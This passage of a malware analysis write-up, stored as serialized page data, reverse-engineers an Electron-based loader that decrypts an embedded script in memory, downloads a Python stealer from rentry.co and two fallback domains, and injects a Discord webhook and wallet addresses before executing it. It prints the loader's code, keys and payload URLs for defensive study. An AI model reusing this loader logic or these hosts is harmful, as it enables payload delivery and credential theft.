Decrypted payloads are never written to disk, making detection by traditional file-based scanners nearly impossible.",[2741,8653,8654,8657],{},[1736,8655,8656],{},"Modular and Reusable Architecture",": Through PowerShell parameters, SharpLoader can be flexibly reused across campaigns with varying payloads and runtime behaviors.",[1511,8659,8661,8662,8664],{"id":8660},"_5-deep-dive-mainexe-electron-based-malware-loader","5. Deep Dive: ",[1524,8663,6639],{}," – Electron-Based Malware Loader",[806,8666,816],{},[806,8668,8669,8670,8672,8673,8676,8677,8679,8680,8682],{},"During reverse engineering, it became clear that ",[1524,8671,6639],{},", flagged by Microsoft Defender for Endpoint, was not a conventional binary but an ",[1736,8674,8675],{},"Electron-based malware loader",". It was delivered inside an archive named ",[1524,8678,7852],{},", which ",[1524,8681,6635],{}," downloaded and extracted at runtime. Once unpacked, the structure and contents strongly resembled a typical Electron application.",[810,8684,8686],{"id":8685},"_51-recognizing-electron-structure","5.1 Recognizing Electron Structure",[806,8688,1536],{},[806,8690,8691],{},"The extracted folder included files such as:",[2738,8693,8694,8705,8713,8719],{},[2741,8695,8696,2289,8699,2289,8702],{},[1524,8697,8698],{},"chrome_100_percent.pak",[1524,8700,8701],{},"v8_context_snapshot.bin",[1524,8703,8704],{},"d3dcompiler_47.dll",[2741,8706,8707,5611,8710],{},[1524,8708,8709],{},"LICENSES.chromium",[1524,8711,8712],{},"LICENSES.electron",[2741,8714,8715,8716,8718],{},"A large ",[1524,8717,6639],{}," binary (~150 MB)",[2741,8720,8721,8722,8724,8725,8727,8728],{},"A ",[1524,8723,7862],{}," folder containing ",[1524,8726,7089],{}," and a secondary binary ",[1524,8729,8730],{},"elevate.exe",[806,8732,8733],{},[1449,8734],{"alt":8735,"src":8736},"Packaged Windows 64-bit version of the desktop app","https://res.cloudinary.com/c4a8/image/upload/v1749796955/blog/pics/electron-app-windows-x64.png",[806,8738,8739,8740,8742],{},"These are all strong indicators of an Electron app, which uses Chromium and Node.js to package JavaScript-based desktop applications. The presence of ",[1524,8741,8730],{},", a signed Microsoft binary often used to escalate privileges, raised further suspicion—it could be abused to launch child processes with elevated rights.",[810,8744,8746],{"id":8745},"_52-unpacking-and-static-analysis-deep-dive","5.2 Unpacking and Static Analysis (Deep Dive)",[806,8748,1536],{},[806,8750,8751,8752,8754,8755,8757,8758,8760,8761,8763,8764,8767],{},"Rather than executing ",[1524,8753,6639],{},", I opted for a static analysis approach to avoid triggering any live behavior. My initial suspicion that ",[1524,8756,6639],{}," was built with Electron was confirmed by locating the ",[1524,8759,7089],{}," file inside the ",[1524,8762,7862],{}," directory. In Electron apps, this archive contains all core application logic, such as JavaScript files, configuration (",[1524,8765,8766],{},"package.json","), and assets, packed into a custom format for performance and obfuscation purposes.",[806,8769,8620,8770,8773,8774,8777],{},[1524,8771,8772],{},".asar"," archive is essentially a read-only, high-performance container similar to ",[1524,8775,8776],{},".zip",", but optimized for Electron’s runtime. While not encrypted, it obfuscates code access, making static analysis more challenging unless unpacked.",[806,8779,8780,8781,8784],{},"To unpack it, I used the official ",[1524,8782,8783],{},"asar"," tool provided via npm. The steps were:",[1545,8786,8788],{"className":1747,"code":8787,"language":1749,"meta":863,"style":863},"npm install -g asar\nasar extract app.asar extracted_app\n",[1524,8789,8790,8804],{"__ignoreMap":863},[1588,8791,8792,8795,8798,8801],{"class":1590,"line":1591},[1588,8793,8794],{"class":1756},"npm",[1588,8796,8797],{"class":1774}," install",[1588,8799,8800],{"class":1760}," -g",[1588,8802,8803],{"class":1774}," asar\n",[1588,8805,8806,8808,8811,8814],{"class":1590,"line":864},[1588,8807,8783],{"class":1756},[1588,8809,8810],{"class":1774}," extract",[1588,8812,8813],{"class":1774}," app.asar",[1588,8815,8816],{"class":1774}," extracted_app\n",[806,8818,8819,8820,8823],{},"Running the above commands extracted the content into a working folder (",[1524,8821,8822],{},"extracted_app/","), which revealed the actual JavaScript application code. This included:",[2738,8825,8826,8847,8855],{},[2741,8827,8828,2289,8831,2289,8834,8837,8838,8840,8841,8843,8844,8846],{},[1524,8829,8830],{},"jscryter.js",[1524,8832,8833],{},"input.js",[1524,8835,8836],{},"obf.js",": These scripts form the malware logic. ",[1524,8839,8830],{}," appears to orchestrate payload delivery, ",[1524,8842,8833],{}," defines configuration constants or command logic, and ",[1524,8845,8836],{}," is a heavily obfuscated script likely containing the core payload logic.",[2741,8848,8849,2289,8851,8854],{},[1524,8850,8766],{},[1524,8852,8853],{},"package-lock.json",": Define the runtime environment",[2741,8856,8857,8860,8861,2289,8864,2289,8867],{},[1524,8858,8859],{},"node_modules/",": Contains all dependencies like ",[1524,8862,8863],{},"axios",[1524,8865,8866],{},"adm-zip",[1524,8868,8869],{},"child_process",[806,8871,8872,8873,8875,8876,2786],{},"The unpacked contents enabled complete visibility into the logic of the malware without requiring execution, which was essential for safe reverse engineering. This step confirmed that ",[1524,8874,6639],{}," served purely as a runtime wrapper for the malicious scripts hidden inside ",[1524,8877,7089],{},[810,8879,8881],{"id":8880},"_53-what-the-static-analysis-revealed","5.3. What the Static Analysis Revealed",[806,8883,1536],{},[806,8885,8886],{},"By manually inspecting the code, I confirmed the malware logic was fully JavaScript-based, executed within the Electron runtime. The scripts were designed to:",[2738,8888,8889,8896,8901,8904],{},[2741,8890,8891,8892,8895],{},"Download an encrypted payload (",[1524,8893,8894],{},"pyth.zip",") from fallback URLs",[2741,8897,8898,8899],{},"Extract the archive using ",[1524,8900,8866],{},[2741,8902,8903],{},"Perform string replacement to inject specific credentials or wallet addresses",[2741,8905,8906,8907,8909,8910,5611,8913],{},"Launch the resulting Python file (",[1524,8908,6643],{},") via ",[1524,8911,8912],{},"child_process.exec()",[1524,8914,6615],{},[806,8916,8917,8918,8924],{},"Crucially, the loader also included logic to ",[1736,8919,8920,8921,8923],{},"copy ",[1524,8922,6635],{}," into the user's AppData directory"," if it wasn't already present—reinforcing persistence and maintaining the infection loop.",[1511,8926,8928,8929,8931],{"id":8927},"_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","6. Deep Dive: ",[1524,8930,8833],{}," – The Encrypted JavaScript Payload Loader",[806,8933,816],{},[806,8935,8936,8938],{},[1524,8937,8833],{}," is a critical component in the analyzed malware chain, functioning as the decryption and execution hub for an encrypted JavaScript payload. This script hides its core functionality behind a strong encryption layer and only reveals its behavior during runtime.",[810,8940,8942],{"id":8941},"_61-encryption-and-decryption-mechanics","6.1 Encryption and Decryption Mechanics",[806,8944,1536],{},[806,8946,8947,8948,8950],{},"At first glance, ",[1524,8949,8833],{}," contains very little readable code. However, its primary purpose is to decrypt and execute a large obfuscated JavaScript blob stored within the script itself.",[1671,8952,8954],{"id":8953},"_611-decryption-logic","6.1.1 Decryption Logic",[806,8956,1677],{},[806,8958,8959,8960,8963],{},"The script defines a ",[1524,8961,8962],{},"decrypt()"," function that accepts four parameters:",[2738,8965,8966,8972,8978,8984],{},[2741,8967,8968,8971],{},[1524,8969,8970],{},"encdata",": The encrypted Base64-encoded data",[2741,8973,8974,8977],{},[1524,8975,8976],{},"masterkey",": A plaintext passphrase",[2741,8979,8980,8983],{},[1524,8981,8982],{},"salt",": A cryptographic salt (Base64)",[2741,8985,8986,8989],{},[1524,8987,8988],{},"iv",": The initialization vector for AES decryption (Base64)",[806,8991,8992,8993,8996],{},"The decryption process is implemented using Node.js’s built-in ",[1524,8994,8995],{},"crypto"," module. It proceeds as follows:",[4351,8998,8999,9106,9218],{},[2741,9000,9001,9004,9005,9080],{},[1736,9002,9003],{},"Key Derivation:","\nThe script derives a 256-bit symmetric key using PBKDF2 (Password-Based Key Derivation Function 2):",[1545,9006,9010],{"className":9007,"code":9008,"language":9009,"meta":863,"style":863},"language-js shiki shiki-themes github-light github-dark","const key = crypto.pbkdf2Sync(\n masterkey,\n Buffer.from(salt, \"base64\"),\n 100000,\n 32,\n \"sha512\",\n);\n","js",[1524,9011,9012,9032,9037,9054,9062,9069,9076],{"__ignoreMap":863},[1588,9013,9014,9017,9020,9023,9026,9029],{"class":1590,"line":1591},[1588,9015,9016],{"class":1770},"const",[1588,9018,9019],{"class":1760}," key",[1588,9021,9022],{"class":1770}," =",[1588,9024,9025],{"class":1778}," crypto.",[1588,9027,9028],{"class":1756},"pbkdf2Sync",[1588,9030,9031],{"class":1778},"(\n",[1588,9033,9034],{"class":1590,"line":864},[1588,9035,9036],{"class":1778}," masterkey,\n",[1588,9038,9039,9042,9045,9048,9051],{"class":1590,"line":1814},[1588,9040,9041],{"class":1778}," Buffer.",[1588,9043,9044],{"class":1756},"from",[1588,9046,9047],{"class":1778},"(salt, ",[1588,9049,9050],{"class":1774},"\"base64\"",[1588,9052,9053],{"class":1778},"),\n",[1588,9055,9056,9059],{"class":1590,"line":1831},[1588,9057,9058],{"class":1760}," 100000",[1588,9060,9061],{"class":1778},",\n",[1588,9063,9064,9067],{"class":1590,"line":2135},[1588,9065,9066],{"class":1760}," 32",[1588,9068,9061],{"class":1778},[1588,9070,9071,9074],{"class":1590,"line":2141},[1588,9072,9073],{"class":1774}," \"sha512\"",[1588,9075,9061],{"class":1778},[1588,9077,9078],{"class":1590,"line":2147},[1588,9079,2308],{"class":1778},[2738,9081,9082,9088,9094,9100],{},[2741,9083,9084,9087],{},[1736,9085,9086],{},"Hash function:"," SHA-512",[2741,9089,9090,9093],{},[1736,9091,9092],{},"Iterations:"," 100,000",[2741,9095,9096,9099],{},[1736,9097,9098],{},"Key length:"," 32 bytes (256 bits)",[2741,9101,9102,9105],{},[1736,9103,9104],{},"Salt:"," Supplied as a Base64-decoded input",[2741,9107,9108,9111,9112,9162,9164,9165],{},[1736,9109,9110],{},"AES-256-CBC Decryption:","\nThe derived key is then used to create an AES decipher object:",[1545,9113,9115],{"className":9007,"code":9114,"language":9009,"meta":863,"style":863},"const decipher = crypto.createDecipheriv(\n \"aes-256-cbc\",\n key,\n Buffer.from(iv, \"base64\"),\n);\n",[1524,9116,9117,9133,9140,9145,9158],{"__ignoreMap":863},[1588,9118,9119,9121,9124,9126,9128,9131],{"class":1590,"line":1591},[1588,9120,9016],{"class":1770},[1588,9122,9123],{"class":1760}," decipher",[1588,9125,9022],{"class":1770},[1588,9127,9025],{"class":1778},[1588,9129,9130],{"class":1756},"createDecipheriv",[1588,9132,9031],{"class":1778},[1588,9134,9135,9138],{"class":1590,"line":864},[1588,9136,9137],{"class":1774}," \"aes-256-cbc\"",[1588,9139,9061],{"class":1778},[1588,9141,9142],{"class":1590,"line":1814},[1588,9143,9144],{"class":1778}," key,\n",[1588,9146,9147,9149,9151,9154,9156],{"class":1590,"line":1831},[1588,9148,9041],{"class":1778},[1588,9150,9044],{"class":1756},[1588,9152,9153],{"class":1778},"(iv, ",[1588,9155,9050],{"class":1774},[1588,9157,9053],{"class":1778},[1588,9159,9160],{"class":1590,"line":2135},[1588,9161,2308],{"class":1778},[2016,9163],{},"The encrypted payload is decrypted using standard CBC (Cipher Block Chaining) mode:",[1545,9166,9168],{"className":9007,"code":9167,"language":9009,"meta":863,"style":863},"let decrypted = decipher.update(encdata, \"base64\", \"utf8\");\ndecrypted += decipher.final(\"utf8\");\n",[1524,9169,9170,9199],{"__ignoreMap":863},[1588,9171,9172,9175,9178,9181,9184,9187,9190,9192,9194,9197],{"class":1590,"line":1591},[1588,9173,9174],{"class":1770},"let",[1588,9176,9177],{"class":1778}," decrypted ",[1588,9179,9180],{"class":1770},"=",[1588,9182,9183],{"class":1778}," decipher.",[1588,9185,9186],{"class":1756},"update",[1588,9188,9189],{"class":1778},"(encdata, ",[1588,9191,9050],{"class":1774},[1588,9193,2289],{"class":1778},[1588,9195,9196],{"class":1774},"\"utf8\"",[1588,9198,2308],{"class":1778},[1588,9200,9201,9204,9207,9209,9212,9214,9216],{"class":1590,"line":864},[1588,9202,9203],{"class":1778},"decrypted ",[1588,9205,9206],{"class":1770},"+=",[1588,9208,9183],{"class":1778},[1588,9210,9211],{"class":1756},"final",[1588,9213,2030],{"class":1778},[1588,9215,9196],{"class":1774},[1588,9217,2308],{"class":1778},[2741,9219,9220,9223,9224,9227,9228,9249,9251],{},[1736,9221,9222],{},"Dynamic Execution:","\nThe decrypted JavaScript code is never written to disk. Instead, it is dynamically executed in memory using the ",[1524,9225,9226],{},"Function"," constructor:",[1545,9229,9231],{"className":9007,"code":9230,"language":9009,"meta":863,"style":863},"new Function(\"require\", decrypted)(require);\n",[1524,9232,9233],{"__ignoreMap":863},[1588,9234,9235,9238,9241,9243,9246],{"class":1590,"line":1591},[1588,9236,9237],{"class":1770},"new",[1588,9239,9240],{"class":1756}," Function",[1588,9242,2030],{"class":1778},[1588,9244,9245],{"class":1774},"\"require\"",[1588,9247,9248],{"class":1778},", decrypted)(require);\n",[2016,9250],{},"This technique enables fileless execution, reducing the chance of detection by traditional antivirus engines that rely on disk-based scanning.",[806,9253,9254],{},"This approach demonstrates a layered defense against reverse engineering by combining key derivation, strong encryption, and dynamic in-memory execution.",[806,9256,9257],{},[1736,9258,9259],{},"Key Material and Encrypted Data",[806,9261,9262],{},"The script includes the following hardcoded inputs:",[2738,9264,9265,9271,9279,9287],{},[2741,9266,9267,9270],{},[1736,9268,9269],{},"Encrypted Data:"," A massive Base64-encoded blob",[2741,9272,9273,2025,9276],{},[1736,9274,9275],{},"Master Key:",[1524,9277,9278],{},"9uNXNGt8/7kN7ZiEvy1OdYNpbcnzkERs",[2741,9280,9281,2025,9283,9286],{},[1736,9282,9104],{},[1524,9284,9285],{},"maXtklzMEZRY9dbul/XPSw=="," (Base64-encoded)",[2741,9288,9289,2025,9292,9286],{},[1736,9290,9291],{},"IV:",[1524,9293,9294],{},"HwK6sOz7FBbL+YsrOxtYUg==",[806,9296,9297,9298,2786],{},"These are all embedded directly in the source code of ",[1524,9299,8833],{},[810,9301,9303],{"id":9302},"_62-post-decryption-payload-behavior","6.2 Post-Decryption Payload Behavior",[806,9305,1536],{},[806,9307,9308],{},"Once decrypted, the embedded payload becomes a full JavaScript program that performs the following malicious actions:",[1671,9310,9312],{"id":9311},"_621-environment-preparation","6.2.1 Environment Preparation",[806,9314,1677],{},[806,9316,9317],{},"The decrypted payload begins by setting up its execution environment using built-in Node.js modules. This setup phase ensures that all required paths and working directories are clearly defined before any malicious behavior occurs.",[2738,9319,9320,9353],{},[2741,9321,9322,9325,9326,9329,9330],{},[1736,9323,9324],{},"Temporary Directory Resolution:","\nThe malware calls ",[1524,9327,9328],{},"os.tmpdir()"," to determine the path to the current system's temporary directory. This is a common tactic for malware as temporary folders are typically writable and less scrutinized by endpoint protection systems.",[1545,9331,9333],{"className":9007,"code":9332,"language":9009,"meta":863,"style":863},"const tempDir = os.tmpdir();\n",[1524,9334,9335],{"__ignoreMap":863},[1588,9336,9337,9339,9342,9344,9347,9350],{"class":1590,"line":1591},[1588,9338,9016],{"class":1770},[1588,9340,9341],{"class":1760}," tempDir",[1588,9343,9022],{"class":1770},[1588,9345,9346],{"class":1778}," os.",[1588,9348,9349],{"class":1756},"tmpdir",[1588,9351,9352],{"class":1778},"();\n",[2741,9354,9355,9358,9359,9372],{},[1736,9356,9357],{},"Path Construction:","\nThe script then constructs absolute paths for two important files:",[2738,9360,9361,9366],{},[2741,9362,9363,9365],{},[1524,9364,8894],{},": The archive that contains the actual second-stage Python-based stealer",[2741,9367,9368,9371],{},[1524,9369,9370],{},"bnd.exe",": An optional executable file that may serve as a persistence backdoor or additional payload",[1545,9373,9375],{"className":9007,"code":9374,"language":9009,"meta":863,"style":863},"const tempFile = path.join(tempDir, \"pyth.zip\");\nconst binderFile = path.join(tempDir, \"bnd.exe\");\n",[1524,9376,9377,9400],{"__ignoreMap":863},[1588,9378,9379,9381,9384,9386,9389,9392,9395,9398],{"class":1590,"line":1591},[1588,9380,9016],{"class":1770},[1588,9382,9383],{"class":1760}," tempFile",[1588,9385,9022],{"class":1770},[1588,9387,9388],{"class":1778}," path.",[1588,9390,9391],{"class":1756},"join",[1588,9393,9394],{"class":1778},"(tempDir, ",[1588,9396,9397],{"class":1774},"\"pyth.zip\"",[1588,9399,2308],{"class":1778},[1588,9401,9402,9404,9407,9409,9411,9413,9415,9418],{"class":1590,"line":864},[1588,9403,9016],{"class":1770},[1588,9405,9406],{"class":1760}," binderFile",[1588,9408,9022],{"class":1770},[1588,9410,9388],{"class":1778},[1588,9412,9391],{"class":1756},[1588,9414,9394],{"class":1778},[1588,9416,9417],{"class":1774},"\"bnd.exe\"",[1588,9419,2308],{"class":1778},[806,9421,9422],{},"This path setup abstracts away OS-specific path syntax and enables the malware to operate seamlessly on any Windows system. It also sets the stage for the file download and unpacking mechanisms that follow.",[1671,9424,9426],{"id":9425},"_622-payload-download-with-fallback-strategy","6.2.2 Payload Download with Fallback Strategy",[806,9428,1677],{},[806,9430,9431],{},"The second major phase of the decrypted JavaScript payload involves downloading a malicious ZIP archive from remote sources. This mechanism is designed with a multi-tiered fallback strategy to increase resilience and availability.",[2738,9433,9434,9465,9550,9584],{},[2741,9435,9436,9439,9440,9459,9461,9462,9464],{},[1736,9437,9438],{},"Primary Link Resolution via Rentry.co","\nThe script begins by resolving a dynamic URL from a text paste service. It sends a GET request to:",[1545,9441,9443],{"className":9007,"code":9442,"language":9009,"meta":863,"style":863},"const url = \"https://rentry.co/7vzd22fg36hfdd33/raw\";\n",[1524,9444,9445],{"__ignoreMap":863},[1588,9446,9447,9449,9452,9454,9457],{"class":1590,"line":1591},[1588,9448,9016],{"class":1770},[1588,9450,9451],{"class":1760}," url",[1588,9453,9022],{"class":1770},[1588,9455,9456],{"class":1774}," \"https://rentry.co/7vzd22fg36hfdd33/raw\"",[1588,9458,2849],{"class":1778},[2016,9460],{},"This returns a plain-text URL string pointing to the actual location of the ",[1524,9463,8894],{}," archive. Using a redirection mechanism like this is a common obfuscation technique—it abstracts the real malicious URL and makes static detection harder.",[2741,9466,9467,9470,9471,9503,9505,9506,9508,9509,9543,9545,9546,9549],{},[1736,9468,9469],{},"Download Execution","\nThe resolved URL is then requested using the Axios library with a response stream:",[1545,9472,9474],{"className":9007,"code":9473,"language":9009,"meta":863,"style":863},"const fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\n",[1524,9475,9476],{"__ignoreMap":863},[1588,9477,9478,9480,9483,9485,9488,9491,9494,9497,9500],{"class":1590,"line":1591},[1588,9479,9016],{"class":1770},[1588,9481,9482],{"class":1760}," fileResponse",[1588,9484,9022],{"class":1770},[1588,9486,9487],{"class":1770}," await",[1588,9489,9490],{"class":1778}," axios.",[1588,9492,9493],{"class":1756},"get",[1588,9495,9496],{"class":1778},"(fileUrl, { responseType: ",[1588,9498,9499],{"class":1774},"\"stream\"",[1588,9501,9502],{"class":1778}," });\n",[2016,9504],{},"The file is written to disk as ",[1524,9507,8894],{}," in the system's temp directory:",[1545,9510,9512],{"className":9007,"code":9511,"language":9009,"meta":863,"style":863},"const writer = fs.createWriteStream(tempFile);\nfileResponse.data.pipe(writer);\n",[1524,9513,9514,9532],{"__ignoreMap":863},[1588,9515,9516,9518,9521,9523,9526,9529],{"class":1590,"line":1591},[1588,9517,9016],{"class":1770},[1588,9519,9520],{"class":1760}," writer",[1588,9522,9022],{"class":1770},[1588,9524,9525],{"class":1778}," fs.",[1588,9527,9528],{"class":1756},"createWriteStream",[1588,9530,9531],{"class":1778},"(tempFile);\n",[1588,9533,9534,9537,9540],{"class":1590,"line":864},[1588,9535,9536],{"class":1778},"fileResponse.data.",[1588,9538,9539],{"class":1756},"pipe",[1588,9541,9542],{"class":1778},"(writer);\n",[2016,9544],{},"This download is wrapped in a ",[1524,9547,9548],{},"Promise"," to ensure synchronous completion before further logic is executed.",[2741,9551,9552,9555,9556,9581,9583],{},[1736,9553,9554],{},"Fallback URLs","\nIf the Rentry-based link fails, the script attempts hardcoded backup locations:",[1545,9557,9559],{"className":9007,"code":9558,"language":9009,"meta":863,"style":863},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip\nhttps://cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[1524,9560,9561,9572],{"__ignoreMap":863},[1588,9562,9563,9566,9568],{"class":1590,"line":1591},[1588,9564,9565],{"class":1756},"https",[1588,9567,3034],{"class":1778},[1588,9569,9571],{"class":9570},"sJ8bj","//cosmicdust.zip/.well-known/pki-validation/pyth.zip\n",[1588,9573,9574,9576,9578],{"class":1590,"line":864},[1588,9575,9565],{"class":1756},[1588,9577,3034],{"class":1778},[1588,9579,9580],{"class":9570},"//cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[2016,9582],{},"These domains are structured to appear as part of standard TLS validation folders, possibly mimicking Let's Encrypt or domain validation paths to reduce suspicion. Each fallback is retried with the same streaming and file-write logic.",[2741,9585,9586,9589,9590,9593],{},[1736,9587,9588],{},"Robustness and Obfuscation","\nThis fallback mechanism ensures that the malware has multiple retrieval paths for its second-stage payload. The use of a dynamic pointer (",[1524,9591,9592],{},"rentry.co",") and multiple failover mirrors makes the malware more resilient to takedowns, blocking, and DNS sinkholes.",[806,9595,9596],{},"This phase demonstrates careful operational planning by the malware authors, using layered redundancy and well-camouflaged delivery infrastructure.",[2738,9598,9599,9605],{},[2741,9600,9601,9602,9604],{},"Downloads ",[1524,9603,8894],{}," from the resolved URL",[2741,9606,9607,9608],{},"If that fails, it attempts fallback mirrors:\n",[2738,9609,9610,9615],{},[2741,9611,9612],{},[1524,9613,9614],{},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip",[2741,9616,9617],{},[1524,9618,9619],{},"https://cosmoplanets.net/well-known/pki-validation/pyth.zip",[1671,9621,9623],{"id":9622},"_623-payload-extraction-and-manipulation","6.2.3 Payload Extraction and Manipulation",[806,9625,1677],{},[806,9627,9628,9629,9631,9632,9634],{},"Once the ",[1524,9630,8894],{}," archive has been successfully downloaded and saved to disk, the malware proceeds to extract its contents and prepare them for execution. This is accomplished using the ",[1524,9633,8866],{}," Node.js library, which allows programmatic handling of ZIP files.",[2738,9636,9637,9684,9711],{},[2741,9638,9639,9642,9678,9680,9681,9683],{},[1736,9640,9641],{},"ZIP Extraction:",[1545,9643,9645],{"className":9007,"code":9644,"language":9009,"meta":863,"style":863},"const zip = new AdmZip(tempFile);\nzip.extractAllTo(tempDir, true);\n",[1524,9646,9647,9664],{"__ignoreMap":863},[1588,9648,9649,9651,9654,9656,9659,9662],{"class":1590,"line":1591},[1588,9650,9016],{"class":1770},[1588,9652,9653],{"class":1760}," zip",[1588,9655,9022],{"class":1770},[1588,9657,9658],{"class":1770}," new",[1588,9660,9661],{"class":1756}," AdmZip",[1588,9663,9531],{"class":1778},[1588,9665,9666,9669,9672,9674,9676],{"class":1590,"line":864},[1588,9667,9668],{"class":1778},"zip.",[1588,9670,9671],{"class":1756},"extractAllTo",[1588,9673,9394],{"class":1778},[1588,9675,1435],{"class":1760},[1588,9677,2308],{"class":1778},[2016,9679],{},"This extracts all contents of the archive to the system's temporary directory. The ",[1524,9682,1435],{}," flag ensures overwriting of any existing files.",[2741,9685,9686,9689,9690,9692,9693],{},[1736,9687,9688],{},"Archive Contents:","\nThe archive ",[1524,9691,8894],{}," includes a fully bundled Python project, including:",[2738,9694,9695,9698,9701],{},[2741,9696,9697],{},"A directory structure resembling a legitimate Python package",[2741,9699,9700],{},"Several Python modules and dependencies",[2741,9702,9703,9704,9706,9707,9710],{},"The key file ",[1524,9705,6643],{}," located at ",[1524,9708,9709],{},"Crypto/Util/astor.py",", which is the main stealer payload",[2741,9712,9713,9716,9717,9719,9720,9740],{},[1736,9714,9715],{},"Placeholder Replacement:","\nThe malware performs dynamic substitution of predefined placeholders within ",[1524,9718,6643],{}," to inject attacker-controlled configuration data such as:",[2738,9721,9722,9725,9728,9734],{},[2741,9723,9724],{},"A Discord webhook URL",[2741,9726,9727],{},"Cryptocurrency wallet addresses (BTC, ETH, DOGE, LTC, XMR, etc.)",[2741,9729,9730,9731,2772],{},"A user identifier (",[1524,9732,9733],{},"%USERID%",[2741,9735,9736,9737,2772],{},"An error status flag (",[1524,9738,9739],{},"%ERRORSTATUS%",[1545,9741,9743],{"className":9007,"code":9742,"language":9009,"meta":863,"style":863},"fs.readFile(extractedDir + \"\\Crypto\\Util\\astor.py\", 'utf8', (err, data) => {\n let updatedFile = data\n .replace(\"%DISCORD%\", \u003Cwebhook>)\n .replace(\"%ADDRESSBTC%\", \u003Cbtc_address>)\n ...\n .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n\n fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n});\n",[1524,9744,9745,9805,9818,9841,9851,9856,9861,9866,9871],{"__ignoreMap":863},[1588,9746,9747,9750,9753,9756,9758,9761,9764,9767,9770,9773,9776,9779,9781,9784,9787,9791,9793,9796,9799,9802],{"class":1590,"line":1591},[1588,9748,9749],{"class":1778},"fs.",[1588,9751,9752],{"class":1756},"readFile",[1588,9754,9755],{"class":1778},"(extractedDir ",[1588,9757,2778],{"class":1770},[1588,9759,9760],{"class":1774}," \"",[1588,9762,9763],{"class":1760},"\\C",[1588,9765,9766],{"class":1774},"rypto",[1588,9768,9769],{"class":1760},"\\U",[1588,9771,9772],{"class":1774},"til",[1588,9774,9775],{"class":1760},"\\a",[1588,9777,9778],{"class":1774},"stor.py\"",[1588,9780,2289],{"class":1778},[1588,9782,9783],{"class":1774},"'utf8'",[1588,9785,9786],{"class":1778},", (",[1588,9788,9790],{"class":9789},"s4XuR","err",[1588,9792,2289],{"class":1778},[1588,9794,9795],{"class":9789},"data",[1588,9797,9798],{"class":1778},") ",[1588,9800,9801],{"class":1770},"=>",[1588,9803,9804],{"class":1778}," {\n",[1588,9806,9807,9810,9813,9815],{"class":1590,"line":864},[1588,9808,9809],{"class":1770}," let",[1588,9811,9812],{"class":1778}," updatedFile ",[1588,9814,9180],{"class":1770},[1588,9816,9817],{"class":1778}," data\n",[1588,9819,9820,9823,9826,9828,9831,9834,9838],{"class":1590,"line":1814},[1588,9821,9822],{"class":1778}," .",[1588,9824,9825],{"class":1756},"replace",[1588,9827,2030],{"class":1778},[1588,9829,9830],{"class":1774},"\"%DISCORD%\"",[1588,9832,9833],{"class":1778},", \u003C",[1588,9835,9837],{"class":9836},"s9eBZ","webhook",[1588,9839,9840],{"class":1778},">)\n",[1588,9842,9843,9846,9849],{"class":1590,"line":1831},[1588,9844,9845],{"class":1778}," .replace(\"%ADDRESSBTC%\", \u003C",[1588,9847,9848],{"class":1760},"btc_address",[1588,9850,9840],{"class":1778},[1588,9852,9853],{"class":1590,"line":2135},[1588,9854,9855],{"class":1778}," ...\n",[1588,9857,9858],{"class":1590,"line":2141},[1588,9859,9860],{"class":1778}," .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n",[1588,9862,9863],{"class":1590,"line":2147},[1588,9864,9865],{"emptyLinePlaceholder":508},"\n",[1588,9867,9868],{"class":1590,"line":2153},[1588,9869,9870],{"class":1778}," fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n",[1588,9872,9873],{"class":1590,"line":2159},[1588,9874,9875],{"class":1778},"});\n",[806,9877,9878],{},"This dynamic manipulation phase is essential. By delaying the insertion of attacker-controlled values until runtime, the payload avoids static detection and allows the operator to adapt targets and exfiltration endpoints without repackaging the archive.",[2738,9880,9881],{},[2741,9882,9883,9884,9886,9887],{},"Replaces placeholder strings in ",[1524,9885,6643],{},":\n",[2738,9888,9889,9895,9905],{},[2741,9890,9891,9892],{},"Discord webhook: ",[1524,9893,9894],{},"%DISCORD%",[2741,9896,9897,9898,2289,9901,9904],{},"Wallet addresses: ",[1524,9899,9900],{},"%ADDRESSBTC%",[1524,9902,9903],{},"%ADDRESSETH%",", etc.",[2741,9906,9907],{},"User ID and error flags",[1671,9909,9911],{"id":9910},"_624-malware-execution","6.2.4 Malware Execution",[806,9913,1677],{},[2738,9915,9916],{},[2741,9917,9918,9919],{},"Once the placeholder injection into astor.py is complete, the malware initiates execution of the stealer via a system call",[1545,9920,9922],{"className":9007,"code":9921,"language":9009,"meta":863,"style":863},"exec(\"python.exe Crypto\\\\Util\\\\astor.py\");\n",[1524,9923,9924],{"__ignoreMap":863},[1588,9925,9926,9929,9931,9934,9937,9940,9942,9945],{"class":1590,"line":1591},[1588,9927,9928],{"class":1756},"exec",[1588,9930,2030],{"class":1778},[1588,9932,9933],{"class":1774},"\"python.exe Crypto",[1588,9935,9936],{"class":1760},"\\\\",[1588,9938,9939],{"class":1774},"Util",[1588,9941,9936],{"class":1760},[1588,9943,9944],{"class":1774},"astor.py\"",[1588,9946,2308],{"class":1778},[806,9948,9949],{},"This command is executed using Node.js’s child_process.exec function and launches the embedded Python payload in a separate process. This specific execution pattern—python.exe with the argument Crypto\\Util\\astor.py—was observed in telemetry data collected by Microsoft Defender for Endpoint, making it a reliable detection artifact. In practice, the execution chain looks like this:",[806,9951,9952],{},"The full malware execution chain, as observed in Microsoft Defender for Endpoint telemetry, follows this sequence:",[2738,9954,9955,9963,9970,9977],{},[2741,9956,9957,9959,9960],{},[1524,9958,6639],{}," (Electron-based container) invokes ",[1524,9961,9962],{},"node.exe",[2741,9964,9965,9967,9968],{},[1524,9966,9962],{}," launches ",[1524,9969,7144],{},[2741,9971,9972,9974,9975],{},[1524,9973,7144],{}," starts ",[1524,9976,6615],{},[2741,9978,9979,9981,9982],{},[1524,9980,6615],{}," executes the file ",[1524,9983,7154],{},[1671,9985,9987],{"id":9986},"_625-persistence-reinforcement","6.2.5 Persistence Reinforcement",[806,9989,1677],{},[806,9991,9992,9993,9995],{},"To ensure long-term presence on the infected system, the decrypted JavaScript payload includes logic to re-establish persistence by copying the initial binary (",[1524,9994,6635],{},") to a hidden location within the user’s profile.",[806,9997,9998],{},[1736,9999,10000],{},"Target Directory",[806,10002,10003],{},"The file is copied to a directory 